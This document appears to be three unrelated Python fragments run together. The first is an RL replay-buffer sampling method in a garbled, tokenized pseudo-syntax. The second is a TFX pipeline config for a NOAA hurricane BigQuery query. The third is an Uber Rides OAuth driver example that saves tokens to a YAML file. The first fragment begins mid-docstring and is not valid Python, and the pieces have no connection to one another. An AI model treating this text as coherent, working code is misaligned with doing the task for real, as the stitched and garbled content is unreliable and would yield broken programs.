batch = { 'states' : states, 'actions' : actions, 'rewards' : rewards, 'next_states': next_states, 'dones' : dones} '''<line_sep>self.batch_idxs=self.sample_idxs(self.batch_size)<line_sep>batch={}<for_stmt>k self.data_keys<block_start><if_stmt>k<eq>'next_states'<block_start>batch[k]=sample_next_states(self.head self.max_size self.ns_idx_offset self.batch_idxs self.states self.ns_buffer)<block_end><else_stmt><block_start>batch[k]=util.batch_get(getattr(self k) self.batch_idxs)<block_end><block_end><return>batch<block_end><def_stmt>sample_idxs self batch_size<block_start>'''Batch indices a sampled random uniformly'''<line_sep>batch_idxs=np.random.randint(self.size size=batch_size)<if_stmt>self.use_cer# add the latest sample <block_start>batch_idxs[-1]=self.head<block_end><return>batch_idxs<block_end><block_end>
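# ---------------------------------------------------------------------------
# Illustrative sketch (not part of slm_lab): `sample_next_states` above avoids
# storing a full `next_states` array -- `states[idx + offset]` is reused, and
# only the newest next_states, which have not yet been written into `states`,
# live in `ns_buffer`. The self-contained example below mimics that indexing
# with plain lists standing in for util.batch_get; every name and number here
# is hypothetical.
if __name__ == '__main__':
    max_size, offset = 5, 1          # tiny buffer, single (non-vector) env
    states = [10, 11, 12, 13, 14]    # toy circular-buffer contents
    ns_buffer = deque([99], maxlen=offset)  # next_state of the newest slot
    head = 2                         # states[2] == 12 is the newest experience

    batch_idxs = np.array([0, 1, 2])            # sampled experience indices
    ns_idxs = (batch_idxs + offset) % max_size  # default: reuse states[idx + 1]
    in_buffer = (head < ns_idxs) & (ns_idxs <= head + offset)

    next_states = [states[i] for i in ns_idxs]
    for loc in np.argwhere(in_buffer).flatten():
        next_states[loc] = ns_buffer[int(ns_idxs[loc]) - head - 1]

    # [11, 12, 99]: only the newest experience reads from ns_buffer.
    print(next_states)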
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# NOTE: this is adapted from the official TFX taxi pipeline sample
# You can find it here: https://github.com/tensorflow/tfx/tree/master/tfx/examples/chicago_taxi_pipeline

import os  # pylint: disable=unused-import

# Pipeline name will be used to identify this pipeline
PIPELINE_NAME = 'my_pipeline'

# TODO: replace with your Google Cloud project
GOOGLE_CLOUD_PROJECT = 'your-cloud-project'

# TODO: replace with the GCS bucket where you'd like to store model artifacts
# Only include the bucket name here, without the 'gs://'
GCS_BUCKET_NAME = 'your-gcs-bucket'

# TODO: set your Google Cloud region below (or use us-central1)
GOOGLE_CLOUD_REGION = 'us-central1'

RUN_FN = 'pipeline.model.run_fn'

TRAIN_NUM_STEPS = 100
EVAL_NUM_STEPS = 100

BIG_QUERY_WITH_DIRECT_RUNNER_BEAM_PIPELINE_ARGS = [
    '--project=' + GOOGLE_CLOUD_PROJECT,
    '--temp_location=' + os.path.join('gs://', GCS_BUCKET_NAME, 'tmp'),
]

# The rate at which to sample rows from the Chicago Taxi dataset using BigQuery.
# The full taxi dataset is > 120M records. In the interest of resource
# savings and time, we've set the default for this example to be much smaller.
# Feel free to crank it up and process the full dataset!
_query_sample_rate = 0.0001  # Generate a 0.01% random sample.

# The query that extracts the examples from BigQuery. This sample uses
# a BigQuery public dataset from NOAA
BIG_QUERY_QUERY = """
        SELECT
          usa_wind,
          usa_sshs
        FROM
          `bigquery-public-data.noaa_hurricanes.hurricanes`
        WHERE
          latitude > 19.5
          AND latitude < 64.85
          AND longitude > -161.755
          AND longitude < -68.01
          AND usa_wind IS NOT NULL
          AND longitude IS NOT NULL
          AND latitude IS NOT NULL
          AND usa_sshs IS NOT NULL
          AND usa_sshs > 0
"""

# A dict which contains the training job parameters to be passed to Google
# Cloud AI Platform. For the full set of parameters supported by Google Cloud AI
# Platform, refer to
# https://cloud.google.com/ml-engine/reference/rest/v1/projects.jobs#Job
GCP_AI_PLATFORM_TRAINING_ARGS = {
    'project': GOOGLE_CLOUD_PROJECT,
    'region': 'us-central1',
    # Starting from TFX 0.14, training on AI Platform uses custom containers:
    # https://cloud.google.com/ml-engine/docs/containers-overview
    # You can specify a custom container here. If not specified, TFX will use
    # a public container image matching the installed version of TFX.
    # Set your container name below.
    'masterConfig': {
        'imageUri': 'gcr.io/' + GOOGLE_CLOUD_PROJECT + '/tfx-pipeline'
    },
    # Note that if you do specify a custom container, ensure the entrypoint
    # calls into TFX's run_executor script (tfx/scripts/run_executor.py)
}

# A dict which contains the serving job parameters to be passed to Google
# Cloud AI Platform. For the full set of parameters supported by Google Cloud AI
# Platform, refer to
# https://cloud.google.com/ml-engine/reference/rest/v1/projects.models
GCP_AI_PLATFORM_SERVING_ARGS = {
    'model_name': PIPELINE_NAME,
    'project_id': GOOGLE_CLOUD_PROJECT,
    # The region to use when serving the model. See available regions here:
    # https://cloud.google.com/ml-engine/docs/regions
    'regions': [GOOGLE_CLOUD_REGION],
}
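# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the template): `_query_sample_rate` above is
# not referenced by the hurricane query, which always reads the full table. If
# sampling were wanted, one hedged option is to fold the rate into the WHERE
# clause with RAND(), loosely mirroring how the original taxi sample applies a
# fingerprint-hash filter. The snippet below only builds a query string; it
# never contacts BigQuery, and `_SAMPLED_BIG_QUERY_QUERY` is a made-up name.
_SAMPLED_BIG_QUERY_QUERY = """
        SELECT
          usa_wind,
          usa_sshs
        FROM
          `bigquery-public-data.noaa_hurricanes.hurricanes`
        WHERE
          usa_wind IS NOT NULL
          AND usa_sshs > 0
          AND RAND() < {sample_rate}
""".format(sample_rate=_query_sample_rate)

if __name__ == '__main__':
    # Quick sanity check of the derived configuration values.
    print(_SAMPLED_BIG_QUERY_QUERY)
    print(BIG_QUERY_WITH_DIRECT_RUNNER_BEAM_PIPELINE_ARGS)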
# Copyright (c) 2017 Uber Technologies, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.

"""Initializes an UberRidesClient with OAuth 2.0 Credentials.

This example demonstrates how to get an access token through the
OAuth 2.0 Authorization Code Grant and use credentials to create
an UberRidesClient.

To run this example:

    (1) Set your app credentials in config.driver.yaml
    (2) Run `python authorize_driver.py`
    (3) A success message will print, 'Hello {YOUR_NAME}'
    (4) User OAuth 2.0 credentials are recorded in
        'oauth_driver_session_store.yaml'
"""

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals

from builtins import input

from yaml import safe_dump

from example import utils  # NOQA
from example.utils import fail_print
from example.utils import response_print
from example.utils import success_print
from example.utils import import_app_credentials

from uber_rides.auth import AuthorizationCodeGrant
from uber_rides.client import UberRidesClient
from uber_rides.errors import ClientError
from uber_rides.errors import ServerError
from uber_rides.errors import UberIllegalState


def authorization_code_grant_flow(credentials, storage_filename):
    """Get an access token through Authorization Code Grant.

    Parameters
        credentials (dict)
            All your app credentials and information
            imported from the configuration file.
        storage_filename (str)
            Filename to store OAuth 2.0 Credentials.

    Returns
        (UberRidesClient)
            An UberRidesClient with OAuth 2.0 Credentials.
    """
    auth_flow = AuthorizationCodeGrant(
        credentials.get('client_id'),
        credentials.get('scopes'),
        credentials.get('client_secret'),
        credentials.get('redirect_url'),
    )

    auth_url = auth_flow.get_authorization_url()
    login_message = 'Login as a driver and grant access by going to:\n\n{}\n'
    login_message = login_message.format(auth_url)
    response_print(login_message)

    redirect_url = 'Copy the URL you are redirected to and paste here:\n\n'
    result = input(redirect_url).strip()

    try:
        session = auth_flow.get_session(result)
    except (ClientError, UberIllegalState) as error:
        fail_print(error)
        return

    credential = session.oauth2credential

    credential_data = {
        'client_id': credential.client_id,
        'redirect_url': credential.redirect_url,
        'access_token': credential.access_token,
        'expires_in_seconds': credential.expires_in_seconds,
        'scopes': list(credential.scopes),
        'grant_type': credential.grant_type,
        'client_secret': credential.client_secret,
        'refresh_token': credential.refresh_token,
    }

    with open(storage_filename, 'w') as yaml_file:
        yaml_file.write(safe_dump(credential_data, default_flow_style=False))

    return UberRidesClient(session, sandbox_mode=True)


def hello_user(api_client):
    """Use an authorized client to fetch and print profile information.

    Parameters
        api_client (UberRidesClient)
            An UberRidesClient with OAuth 2.0 credentials.
    """
    try:
        response = api_client.get_driver_profile()
    except (ClientError, ServerError) as error:
        fail_print(error)
        return
    else:
        profile = response.json

        first_name = profile.get('first_name')
        last_name = profile.get('last_name')
        email = profile.get('email')

        message = 'Hello, {} {}. Successfully granted access token to {}.'
        message = message.format(first_name, last_name, email)
        success_print(message)
        success_print(profile)

        success_print('---')
        response = api_client.get_driver_trips()
        trips = response.json
        success_print(trips)

        success_print('---')
        response = api_client.get_driver_payments()
        payments = response.json
        success_print(payments)


if __name__ == '__main__':
    """Run the example.

    Get an access token through the OAuth 2.0 Authorization Code Grant
    and use credentials to create an UberRidesClient.
    """
    credentials = import_app_credentials('config.driver.yaml')

    api_client = authorization_code_grant_flow(
        credentials,
        'oauth_driver_session_store.yaml',
    )

    hello_user(api_client)